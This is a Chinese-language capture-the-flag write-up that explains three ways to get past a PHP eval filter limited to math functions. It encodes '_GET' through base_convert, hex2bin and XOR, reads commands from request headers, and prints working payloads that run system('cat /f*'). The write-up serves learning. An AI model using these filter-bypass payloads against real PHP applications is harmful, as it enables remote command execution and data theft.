目录

hex2bin    bin2hex

base_convert

动态函数

第一种解法  通过get获取参数

绕过

第二种解法  读取请求头

getallheaders

echo a,b

第三种解法 异或获得更多字符

---

这道题也是很有意思！

通过规定白名单和黑名单 指定了 函数为数学函数 并且参数也只能是规定在白名单中的参数

我们首先要了解 通过进制转换执行命令的第一时间就是想到 hex2bin/bin2hex

hex2bin    bin2hex

这个函数可以将十六进制转换为ASCII码 从而实现数字到字符

所以我们可以通过这里的

接着我们需要了解 base_convert()函数

base_convert

这函数是可以将任意进制进行互相转换

我们这里给出例子

这里的hex2bin是36进制 所以这里可以将十进制转换为字符形式

动态函数

第一种解法  通过get获取参数

我们无法实现system(cat /flag) 因为36进制不接受特殊的符号 例如空格 所以我们无法直接获取到指令

但是我们换位思考一下

$a($b)

$a=system

$b=cat /f*

最后是不是就是 system(cat /f*)

现在问题在于我们如何接收到参数

这里主要就是通过GET POST方式

_GET[1](_GET[2])

1=system

2=cat /f*

是不是就等于 system(cat /f*)

现在问题转换为如何传递字符了

因为_GET[]都不在白名单中 甚至[]还在黑名单中

这里就涉及绕过了

绕过

首先[] 可以通过  {}绕过 很简单

其次_GET 我们可以通过数学编码

我们上面了解的hex2bin 就是可以将十六进制转变为ASCII

这样我们就可以构造_GET了

首先通过 bin2hex转变

得到16进制

但是这里面存在字符

发现正则过滤了字母 所以我们要将他换为全数字 就是十进制

然后通过dechex转换

最后就是hex2bin的了 我们只需要将其的10进制转换为36进制即可

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /*

我给大家简化一下

c=$pi=hex2bin(5f474554) 这里相当于 c=$pi=_GET

($$pi){pi}  这里相当于 $_GET{pi}
(($$pi){abs})  这里相当于 ($_GET{abs})

组合起来 $_GET{pi}($_GET{abs})


pi=system  abs=cat /f*

就可以是 system(cat /f*)

第二种解法  读取请求头

首先 我们构造 get很绕很麻烦 我们能不能直接执行命令

既然我们无法读取get的内容 那么我们直接接受请求头呢

这里就存在一个函数

getallheaders

getallheaders

 可以接受请求头

我们直接使用 exec(getallheaders) 来执行这个命令

这里还需要了了解一个知识点

echo a,b

echo a,b

ab都会输出

所以我们可以直接通过 exec a,b来执行

通过36进制换算

c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

然后通过1:cat /f*访问即可

这里getallheaders需要30进制

第三种解法 异或获得更多字符

我们能不能直接获取flag呢

我们通过异或来获取更多的字符串

我们来编写php代码

<?php
$pl=['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($pl);$k++){
    for($i=0;$i < 9;$i++){
        for($j=1;$j <= 9; $j++){
            $exp=$pl[$k]^$i.$j;
            echo($pl[$k]."^".$i.$j."===>".$exp);
            echo "        ";
        }
    }
}
?>

 

获取_GET了

直接和第一个一样即可

?c=$pi=(mt_srand^(2).(3)).(tanh^(1).(5));$$pi{1}($$pi{0})&1=system&0=cat /f*